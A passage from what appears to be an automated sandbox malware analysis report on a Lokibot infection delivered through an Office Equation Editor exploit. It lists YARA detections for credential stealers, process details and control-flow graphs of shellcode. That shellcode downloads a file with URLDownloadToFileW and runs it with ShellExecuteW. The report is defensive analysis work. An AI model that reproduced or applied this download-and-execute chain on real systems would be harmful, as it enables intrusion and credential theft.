                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Loki_1, Description: Loki Payload, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                                                • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:low
                                                Has exited:false

                                                Target ID:20
                                                Start time:04:11:36
                                                Start date:20/11/2024
                                                Path:C:\Windows\System32\verclsid.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\system32\verclsid.exe" /S /C {00020830-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                                Imagebase:0xffe00000
                                                File size:11'776 bytes
                                                MD5 hash:3796AE13F680D9239210513EDA590E86
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:21
                                                Start time:04:11:36
                                                Start date:20/11/2024
                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
                                                Imagebase:0x13f130000
                                                File size:28'253'536 bytes
                                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:22
                                                Start time:04:11:37
                                                Start date:20/11/2024
                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
                                                Imagebase:0x13f130000
                                                File size:28'253'536 bytes
                                                MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:16%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:45%
                                                  Total number of Nodes:111
                                                  Total number of Limit Nodes:2
                                                  execution_graph 641 35f011a 642 35f0111 641->642 651 35f039a ExitProcess 642->651 658 35f03b3 651->658 659 35f03b9 658->659 661 35f03c0 659->661 664 35f03cf 659->664 663 35f0408 661->663 670 35f0484 661->670 665 35f03d5 664->665 674 35f03f6 665->674 671 35f0486 670->671 672 35f0499 15 API calls 671->672 673 35f048b 672->673 675 35f03f9 674->675 676 35f0484 15 API calls 675->676 677 35f0408 676->677 577 35f05c8 GetPEB 578 35f05d6 577->578 678 35f0055 679 35f0068 678->679 680 35f010c 679->680 681 35f0091 679->681 684 35f039a 16 API calls 680->684 692 35f0101 681->692 685 35f0388 684->685 686 35f03a6 685->686 687 35f03b3 15 API calls 685->687 688 35f03cf 15 API calls 686->688 687->686 689 35f03c0 688->689 690 35f0484 15 API calls 689->690 691 35f0408 689->691 690->691 693 35f0111 692->693 694 35f039a 16 API calls 693->694 695 35f0388 694->695 696 35f03a6 695->696 697 35f03b3 15 API calls 695->697 698 35f03cf 15 API calls 696->698 697->696 699 35f03c0 698->699 700 35f0484 15 API calls 699->700 701 35f0408 699->701 700->701 702 35f00c5 703 35f007c 702->703 705 35f0091 703->705 707 35f010c 703->707 704 35f0101 16 API calls 706 35f00fd 704->706 705->704 705->705 708 35f039a 16 API calls 707->708 709 35f0388 708->709 710 35f03a6 709->710 711 35f03b3 15 API calls 709->711 712 35f03cf 15 API calls 710->712 711->710 713 35f03c0 712->713 714 35f0484 15 API calls 713->714 715 35f0408 713->715 714->715 579 35f0484 580 35f0486 579->580 583 35f0499 LoadLibraryW 580->583 600 35f04b3 583->600 586 35f04a7 631 35f056e URLDownloadToFileW 586->631 589 35f0515 URLDownloadToFileW 614 35f0587 589->614 595 35f0596 ShellExecuteW 598 35f05b5 595->598 629 35f05c1 595->629 597 35f048b 598->597 599 35f05c4 ExitProcess 598->599 601 35f04b6 600->601 602 35f056e 8 API calls 601->602 603 35f04c4 URLDownloadToFileW 601->603 602->603 605 35f0587 5 API calls 603->605 606 35f0577 605->606 607 35f059c 3 API calls 606->607 608 35f058e 607->608 609 35f0596 ShellExecuteW 608->609 611 35f04a0 608->611 610 35f05c1 ExitProcess 609->610 612 35f05b5 609->612 610->612 611->586 611->589 612->611 613 35f05c4 ExitProcess 612->613 615 35f0589 614->615 616 35f058e 615->616 617 35f059c 3 API calls 615->617 618 35f0596 ShellExecuteW 616->618 621 35f0577 616->621 617->616 619 35f05c1 ExitProcess 618->619 620 35f05b5 618->620 619->620 620->621 622 35f05c4 ExitProcess 620->622 623 35f059c 621->623 624 35f059f ShellExecuteW 623->624 625 35f05c1 ExitProcess 624->625 626 35f05b5 625->626 627 35f058e 626->627 628 35f05c4 ExitProcess 626->628 627->595 627->597 630 35f05c4 ExitProcess 629->630 632 35f0577 631->632 633 35f0587 5 API calls 631->633 634 35f059c 3 API calls 632->634 633->632 635 35f058e 634->635 636 35f0596 ShellExecuteW 635->636 639 35f04c4 635->639 637 35f05c1 ExitProcess 636->637 638 35f05b5 636->638 637->638 638->639 640 35f05c4 ExitProcess 638->640 639->589 716 35f0351 717 35f03a6 716->717 718 35f03b3 15 API calls 716->718 719 35f03cf 15 API calls 717->719 718->717 720 35f03c0 719->720 721 35f0484 15 API calls 720->721 722 35f0408 720->722 721->722

                                                  Callgraph

                                                  • Executed
                                                  • Not Executed
                                                  • Opacity -> Relevance
                                                  • Disassembly available
                                                  callgraph 0 Function_035F00FF 1 Function_035F059C 20 Function_035F05C1 1->20 2 Function_035F039A 9 Function_035F03B3 2->9 13 Function_035F03CF 2->13 19 Function_035F0484 2->19 3 Function_035F011A 3->2 3->9 3->13 3->19 4 Function_035F0499 4->1 8 Function_035F04B3 4->8 14 Function_035F056E 4->14 17 Function_035F0587 4->17 4->20 5 Function_035F03F6 5->19 6 Function_035F0055 6->2 6->9 6->13 6->19 22 Function_035F0101 6->22 7 Function_035F01D4 8->1 8->14 8->17 8->20 9->13 9->19 21 Function_035F0641 9->21 10 Function_035F0272 11 Function_035F0351 11->9 11->13 11->19 12 Function_035F05F0 13->5 13->19 13->21 14->1 14->17 14->20 15 Function_035F05C8 15->12 16 Function_035F01C8 17->1 17->20 18 Function_035F00C5 18->2 18->9 18->13 18->19 18->22 19->4 22->2 22->9 22->13 22->19 23 Function_035F0000

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 35f0499-35f04a5 LoadLibraryW call 35f04b3 3 35f04a7-35f0514 call 35f056e 0->3 4 35f0515 0->4 3->4 5 35f0516-35f051c 3->5 4->5 9 35f051e-35f0594 URLDownloadToFileW call 35f0587 call 35f059c 5->9 10 35f051d 5->10 29 35f05fb-35f0607 9->29 30 35f0596-35f05ae ShellExecuteW 9->30 10->9 33 35f060a 29->33 31 35f05b5-35f05b6 30->31 32 35f05b0 call 35f05c1 30->32 34 35f05b8 31->34 35 35f0621-35f0625 31->35 32->31 36 35f060c-35f0610 33->36 37 35f0612-35f0616 33->37 34->33 43 35f05ba 34->43 41 35f0629 35->41 42 35f0627 35->42 36->37 38 35f061e 36->38 39 35f062b-35f062d 37->39 40 35f0618-35f061c 37->40 38->35 44 35f063d-35f063e 39->44 40->38 40->39 41->39 46 35f062f-35f0638 41->46 42->39 43->39 45 35f05bc-35f05c6 ExitProcess 43->45 49 35f063a 46->49 50 35f0601-35f0604 46->50 49->44 50->46 52 35f0606 50->52 52->33
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(035F048B), ref: 035F0499
                                                    • Part of subcall function 035F04B3: URLDownloadToFileW.URLMON(00000000,035F04C4,?,00000000,00000000), ref: 035F0570
                                                    • Part of subcall function 035F04B3: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F05AE
                                                  • ExitProcess.KERNEL32(00000000), ref: 035F05C6
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                  • String ID:
                                                  • API String ID: 2508257586-0
                                                  • Opcode ID: 33e07834c61a3b4a4d1bff4faa627a9e062eb90e656a724115017dc80b3cc87b
                                                  • Instruction ID: 986ce9dd5f046fa3869211bbbafd224ef9cfc62d48b769d224bacc4b8e91a449
                                                  • Opcode Fuzzy Hash: 33e07834c61a3b4a4d1bff4faa627a9e062eb90e656a724115017dc80b3cc87b
                                                  • Instruction Fuzzy Hash: 2D4153D294C7D22FDB26D774AC2D664BF653A63100F5D8ACE92C60B8F3E3988100C352

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 53 35f04b3-35f04be 55 35f04c4-35f0514 53->55 56 35f04bf call 35f056e 53->56 59 35f0516-35f051c 55->59 60 35f0515 55->60 56->55 62 35f051e-35f0594 URLDownloadToFileW call 35f0587 call 35f059c 59->62 63 35f051d 59->63 60->59 80 35f05fb-35f0607 62->80 81 35f0596-35f05ae ShellExecuteW 62->81 63->62 84 35f060a 80->84 82 35f05b5-35f05b6 81->82 83 35f05b0 call 35f05c1 81->83 85 35f05b8 82->85 86 35f0621-35f0625 82->86 83->82 87 35f060c-35f0610 84->87 88 35f0612-35f0616 84->88 85->84 94 35f05ba 85->94 92 35f0629 86->92 93 35f0627 86->93 87->88 89 35f061e 87->89 90 35f062b-35f062d 88->90 91 35f0618-35f061c 88->91 89->86 95 35f063d-35f063e 90->95 91->89 91->90 92->90 97 35f062f-35f0638 92->97 93->90 94->90 96 35f05bc-35f05c6 ExitProcess 94->96 100 35f063a 97->100 101 35f0601-35f0604 97->101 100->95 101->97 103 35f0606 101->103 103->84
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                  • String ID:
                                                  • API String ID: 3584569557-0
                                                  • Opcode ID: d5a93389f758dc0731de51870d7bc158146041aee29c1b6709a8f8bd08986ff1
                                                  • Instruction ID: 173ecc37bbf85e3cbe1f5804eea09a7a1914054188cca7737176f8ef6efab0f3
                                                  • Opcode Fuzzy Hash: d5a93389f758dc0731de51870d7bc158146041aee29c1b6709a8f8bd08986ff1
                                                  • Instruction Fuzzy Hash: 8E3112D694D3D22FDB26D774AC6D665FF653E62100F5D8ACE92C60B8E3E3988100C752

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 104 35f056e-35f0570 URLDownloadToFileW 105 35f0577-35f0594 call 35f059c 104->105 106 35f0572 call 35f0587 104->106 110 35f05fb-35f0607 105->110 111 35f0596-35f05ae ShellExecuteW 105->111 106->105 114 35f060a 110->114 112 35f05b5-35f05b6 111->112 113 35f05b0 call 35f05c1 111->113 115 35f05b8 112->115 116 35f0621-35f0625 112->116 113->112 117 35f060c-35f0610 114->117 118 35f0612-35f0616 114->118 115->114 124 35f05ba 115->124 122 35f0629 116->122 123 35f0627 116->123 117->118 119 35f061e 117->119 120 35f062b-35f062d 118->120 121 35f0618-35f061c 118->121 119->116 125 35f063d-35f063e 120->125 121->119 121->120 122->120 127 35f062f-35f0638 122->127 123->120 124->120 126 35f05bc-35f05c6 ExitProcess 124->126 130 35f063a 127->130 131 35f0601-35f0604 127->131 130->125 131->127 133 35f0606 131->133 133->114
                                                  APIs
                                                  • URLDownloadToFileW.URLMON(00000000,035F04C4,?,00000000,00000000), ref: 035F0570
                                                    • Part of subcall function 035F0587: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F05AE
                                                    • Part of subcall function 035F0587: ExitProcess.KERNEL32(00000000), ref: 035F05C6
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                  • String ID:
                                                  • API String ID: 3584569557-0
                                                  • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                  • Instruction ID: 8b939d0375e725dbb1412c815649462ba05812a3e7a7dec3cf418e1277df496e
                                                  • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                  • Instruction Fuzzy Hash: B6F0BE91A8D3456DEA22F774AC9AF7A6E68BFC1700F5C0889B3424F0F3D5C48800866A

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 134 35f059c-35f05b6 ShellExecuteW call 35f05c1 138 35f05b8 134->138 139 35f0621-35f0625 134->139 142 35f060a 138->142 143 35f05ba 138->143 140 35f0629 139->140 141 35f0627 139->141 144 35f062b-35f062d 140->144 146 35f062f-35f0638 140->146 141->144 147 35f060c-35f0610 142->147 148 35f0612-35f0616 142->148 143->144 145 35f05bc-35f05c6 ExitProcess 143->145 151 35f063d-35f063e 144->151 154 35f063a 146->154 155 35f0601-35f0604 146->155 147->148 149 35f061e 147->149 148->144 150 35f0618-35f061c 148->150 149->139 150->144 150->149 154->151 155->146 157 35f0606 155->157 157->142
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 035F05AE
                                                    • Part of subcall function 035F05C1: ExitProcess.KERNEL32(00000000), ref: 035F05C6
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExecuteExitProcessShell
                                                  • String ID:
                                                  • API String ID: 1124553745-0
                                                  • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                  • Instruction ID: 5182c780d5ad4986bb8a5c8b95eaa0625f3e79559d4425550e1e0ceb80026f84
                                                  • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                  • Instruction Fuzzy Hash: 83014995A843426DDF30F668B8157B6AB55FBC1710FCC8856AB810B0F7C4C480C3CAEA

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 158 35f0587-35f0589 160 35f058e-35f0594 158->160 161 35f0589 call 35f059c 158->161 162 35f05fb-35f0607 160->162 163 35f0596-35f05ae ShellExecuteW 160->163 161->160 166 35f060a 162->166 164 35f05b5-35f05b6 163->164 165 35f05b0 call 35f05c1 163->165 167 35f05b8 164->167 168 35f0621-35f0625 164->168 165->164 169 35f060c-35f0610 166->169 170 35f0612-35f0616 166->170 167->166 176 35f05ba 167->176 174 35f0629 168->174 175 35f0627 168->175 169->170 171 35f061e 169->171 172 35f062b-35f062d 170->172 173 35f0618-35f061c 170->173 171->168 177 35f063d-35f063e 172->177 173->171 173->172 174->172 179 35f062f-35f0638 174->179 175->172 176->172 178 35f05bc-35f05c6 ExitProcess 176->178 182 35f063a 179->182 183 35f0601-35f0604 179->183 182->177 183->179 185 35f0606 183->185 185->166
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExecuteExitProcessShell
                                                  • String ID:
                                                  • API String ID: 1124553745-0
                                                  • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                  • Instruction ID: 2fb030f9e1292cbe27828f13aa1669e61ce6809cd2f5d80c52a86ad0133191f7
                                                  • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                  • Instruction Fuzzy Hash: 38012B605883056CEE21F2646C44BBAAB95FBC1714F9C8456E7510B0F3C1C48483869D

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 186 35f05c1-35f05c6 ExitProcess
                                                  APIs
                                                  • ExitProcess.KERNEL32(00000000), ref: 035F05C6
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                  • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                  • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                  • Instruction Fuzzy Hash:

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 188 35f05c8-35f05d3 GetPEB 189 35f05d6-35f05e7 call 35f05f0 188->189 192 35f05e9-35f05ed 189->192
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                  • Instruction ID: b36bb4af0dab5832440af1ba466969e4fb03fdfe2e152aba376bd8e5e65bcdcb
                                                  • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                  • Instruction Fuzzy Hash: 20D05E712025028FC304DB04D940E23F37AFFD8211B18C264D6004B66AE770E892CA90

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 193 35f039a-35f03c1 ExitProcess call 35f03b3 call 35f03cf 198 35f0414-35f0430 193->198 199 35f03c4-35f03c9 193->199 205 35f0432-35f0440 198->205 202 35f03cc 199->202 203 35f0431 199->203 206 35f03ce-35f03dd 202->206 207 35f0441 202->207 203->205 208 35f0442-35f044e 205->208 209 35f044f 206->209 210 35f03df-35f03e4 206->210 207->208 214 35f0450-35f045c 208->214 209->214 210->209 213 35f03e6-35f03ec 210->213 213->207 218 35f03ee 213->218 219 35f0462-35f0497 214->219 218->219 220 35f03f0-35f0411 call 35f0484 218->220 220->198
                                                  APIs
                                                  • ExitProcess.KERNEL32(035F0388), ref: 035F039A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.390278380.00000000035F0000.00000004.00000020.00020000.00000000.sdmp, Offset: 035F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_35f0000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: 23081c2f9d4407df301a849fb874a1b2adb20e461331d0472d76cb10e1f8a8a8
                                                  • Instruction ID: 991dbf4e90e48ee306fd43c1f585de7465f5b6f62a493c6663034dca6e9f0011
                                                  • Opcode Fuzzy Hash: 23081c2f9d4407df301a849fb874a1b2adb20e461331d0472d76cb10e1f8a8a8
                                                  • Instruction Fuzzy Hash: 213185AA94EFC11FC316D7746A6E024FF61385300430CCACF869A0B5F3E3649106D356

                                                  Execution Graph

                                                  Execution Coverage:9%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:47
                                                  Total number of Limit Nodes:7
                                                  execution_graph 3525 2643b0 3527 2643b4 3525->3527 3526 26452e 3527->3526 3533 264775 3527->3533 3541 264548 3527->3541 3550 2648d8 3527->3550 3554 264542 3527->3554 3528 26450f 3534 2646ca 3533->3534 3538 2646d9 3533->3538 3535 264918 URLDownloadToFileW 3534->3535 3534->3538 3537 2649d8 3535->3537 3537->3528 3563 3d1754 3538->3563 3571 3d1770 3538->3571 3542 26457c 3541->3542 3543 264918 URLDownloadToFileW 3542->3543 3545 264660 3542->3545 3547 2646d9 3542->3547 3546 2649d8 3543->3546 3545->3528 3546->3528 3548 3d1754 3 API calls 3547->3548 3549 3d1770 3 API calls 3547->3549 3548->3547 3549->3547 3551 264829 3550->3551 3551->3550 3552 3d1754 4 API calls 3551->3552 3553 3d1770 4 API calls 3551->3553 3552->3551 3553->3551 3555 26457c 3554->3555 3556 264918 URLDownloadToFileW 3555->3556 3558 264660 3555->3558 3560 2646d9 3555->3560 3559 2649d8 3556->3559 3558->3528 3559->3528 3561 3d1754 3 API calls 3560->3561 3562 3d1770 3 API calls 3560->3562 3561->3560 3562->3560 3564 3d1bf3 3563->3564 3565 3d17a1 3563->3565 3564->3538 3565->3564 3567 264775 4 API calls 3565->3567 3568 264542 4 API calls 3565->3568 3570 264548 4 API calls 3565->3570 3579 264930 3565->3579 3566 3d1b94 3566->3538 3567->3566 3568->3566 3570->3566 3572 3d1bf3 3571->3572 3573 3d17a1 3571->3573 3572->3538 3573->3572 3575 264775 4 API calls 3573->3575 3576 264542 4 API calls 3573->3576 3577 264930 URLDownloadToFileW 3573->3577 3578 264548 4 API calls 3573->3578 3574 3d1b94 3574->3538 3575->3574 3576->3574 3577->3574 3578->3574 3580 26497b URLDownloadToFileW 3579->3580 3582 2649d8 3580->3582 3582->3566

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 3d1770-3d179b 1 3d17a1-3d17a6 0->1 2 3d1c52-3d1c85 0->2 3 3d17be-3d17c3 1->3 4 3d17a8-3d17ae 1->4 10 3d1c95 2->10 11 3d1c87-3d1c93 2->11 5 3d17c5-3d17d1 3->5 6 3d17d3 3->6 7 3d17b0 4->7 8 3d17b2-3d17bc 4->8 12 3d17d5-3d17d7 5->12 6->12 7->3 8->3 13 3d1c97-3d1c99 10->13 11->13 14 3d17dd-3d17e7 12->14 15 3d1bf3-3d1bfd 12->15 20 3d1cdb-3d1ce5 13->20 21 3d1c9b-3d1ca2 13->21 14->2 19 3d17ed-3d17f2 14->19 17 3d1bff-3d1c08 15->17 18 3d1c0b-3d1c11 15->18 24 3d1c17-3d1c23 18->24 25 3d1c13-3d1c15 18->25 26 3d180a-3d1818 19->26 27 3d17f4-3d17fa 19->27 22 3d1cee-3d1cf4 20->22 23 3d1ce7-3d1ceb 20->23 21->20 28 3d1ca4-3d1cc1 21->28 30 3d1cfa-3d1d06 22->30 31 3d1cf6-3d1cf8 22->31 29 3d1c25-3d1c4f 24->29 25->29 26->15 41 3d181e-3d183d 26->41 32 3d17fc 27->32 33 3d17fe-3d1808 27->33 42 3d1d29-3d1d2e 28->42 43 3d1cc3-3d1cd5 28->43 34 3d1d08-3d1d26 30->34 31->34 32->26 33->26 41->15 50 3d1843-3d184d 41->50 42->43 43->20 50->2 51 3d1853-3d1858 50->51 52 3d185a-3d1860 51->52 53 3d1870-3d1874 51->53 54 3d1864-3d186e 52->54 55 3d1862 52->55 53->15 56 3d187a-3d187e 53->56 54->53 55->53 56->15 57 3d1884-3d1888 56->57 57->15 59 3d188e-3d189e 57->59 60 3d18a4-3d18cb 59->60 61 3d1926-3d1975 59->61 66 3d18cd-3d18d3 60->66 67 3d18e5-3d1913 60->67 78 3d197c-3d198f 61->78 68 3d18d5 66->68 69 3d18d7-3d18e3 66->69 76 3d1915-3d1917 67->76 77 3d1921-3d1924 67->77 68->67 69->67 76->77 77->78 79 3d1995-3d19bc 78->79 80 3d1a17-3d1a66 78->80 85 3d19be-3d19c4 79->85 86 3d19d6-3d1a04 79->86 97 3d1a6d-3d1a80 80->97 87 3d19c8-3d19d4 85->87 88 3d19c6 85->88 95 3d1a06-3d1a08 86->95 96 3d1a12-3d1a15 86->96 87->86 88->86 95->96 96->97 98 3d1b08-3d1b57 97->98 99 3d1a86-3d1aad 97->99 116 3d1b5e-3d1b8c 98->116 104 3d1aaf-3d1ab5 99->104 105 3d1ac7-3d1af5 99->105 106 3d1ab9-3d1ac5 104->106 107 3d1ab7 104->107 114 3d1af7-3d1af9 105->114 115 3d1b03-3d1b06 105->115 106->105 107->105 114->115 115->116 121 3d1b8f call 264775 116->121 122 3d1b8f call 264542 116->122 123 3d1b8f call 264930 116->123 124 3d1b8f call 264548 116->124 119 3d1b94-3d1bf0 121->119 122->119 123->119 124->119
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.415308264.00000000003D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_3d0000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @#c$@#c
                                                  • API String ID: 0-2251068165
                                                  • Opcode ID: b37395b89a2f0ad9f5b93aca9e0138214a07d13e7a2ee04558e05bacf0c79e11
                                                  • Instruction ID: df8fc7de06755c3b8f81bdfa5ce86c56af9ca2283bde13c9227838b772d8ca99
                                                  • Opcode Fuzzy Hash: b37395b89a2f0ad9f5b93aca9e0138214a07d13e7a2ee04558e05bacf0c79e11
                                                  • Instruction Fuzzy Hash: A1F12436B00204AFDB259F68E450B6EBBA2EFC5710F25806BF815AB391DB71DD41CB91

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 125 3d1754-3d179b 126 3d17a1-3d17a6 125->126 127 3d1c52-3d1c85 125->127 128 3d17be-3d17c3 126->128 129 3d17a8-3d17ae 126->129 135 3d1c95 127->135 136 3d1c87-3d1c93 127->136 130 3d17c5-3d17d1 128->130 131 3d17d3 128->131 132 3d17b0 129->132 133 3d17b2-3d17bc 129->133 137 3d17d5-3d17d7 130->137 131->137 132->128 133->128 138 3d1c97-3d1c99 135->138 136->138 139 3d17dd-3d17e7 137->139 140 3d1bf3-3d1bfd 137->140 145 3d1cdb-3d1ce5 138->145 146 3d1c9b-3d1ca2 138->146 139->127 144 3d17ed-3d17f2 139->144 142 3d1bff-3d1c08 140->142 143 3d1c0b-3d1c11 140->143 149 3d1c17-3d1c23 143->149 150 3d1c13-3d1c15 143->150 151 3d180a-3d1818 144->151 152 3d17f4-3d17fa 144->152 147 3d1cee-3d1cf4 145->147 148 3d1ce7-3d1ceb 145->148 146->145 153 3d1ca4-3d1cc1 146->153 155 3d1cfa-3d1d06 147->155 156 3d1cf6-3d1cf8 147->156 154 3d1c25-3d1c4f 149->154 150->154 151->140 166 3d181e-3d183d 151->166 157 3d17fc 152->157 158 3d17fe-3d1808 152->158 167 3d1d29-3d1d2e 153->167 168 3d1cc3-3d1cd5 153->168 159 3d1d08-3d1d26 155->159 156->159 157->151 158->151 166->140 175 3d1843-3d184d 166->175 167->168 168->145 175->127 176 3d1853-3d1858 175->176 177 3d185a-3d1860 176->177 178 3d1870-3d1874 176->178 179 3d1864-3d186e 177->179 180 3d1862 177->180 178->140 181 3d187a-3d187e 178->181 179->178 180->178 181->140 182 3d1884-3d1888 181->182 182->140 184 3d188e-3d189e 182->184 185 3d18a4-3d18cb 184->185 186 3d1926-3d1975 184->186 191 3d18cd-3d18d3 185->191 192 3d18e5-3d1913 185->192 203 3d197c-3d198f 186->203 193 3d18d5 191->193 194 3d18d7-3d18e3 191->194 201 3d1915-3d1917 192->201 202 3d1921-3d1924 192->202 193->192 194->192 201->202 202->203 204 3d1995-3d19bc 203->204 205 3d1a17-3d1a66 203->205 210 3d19be-3d19c4 204->210 211 3d19d6-3d1a04 204->211 222 3d1a6d-3d1a80 205->222 212 3d19c8-3d19d4 210->212 213 3d19c6 210->213 220 3d1a06-3d1a08 211->220 221 3d1a12-3d1a15 211->221 212->211 213->211 220->221 221->222 223 3d1b08-3d1b57 222->223 224 3d1a86-3d1aad 222->224 241 3d1b5e-3d1b8c 223->241 229 3d1aaf-3d1ab5 224->229 230 3d1ac7-3d1af5 224->230 231 3d1ab9-3d1ac5 229->231 232 3d1ab7 229->232 239 3d1af7-3d1af9 230->239 240 3d1b03-3d1b06 230->240 231->230 232->230 239->240 240->241 246 3d1b8f call 264775 241->246 247 3d1b8f call 264542 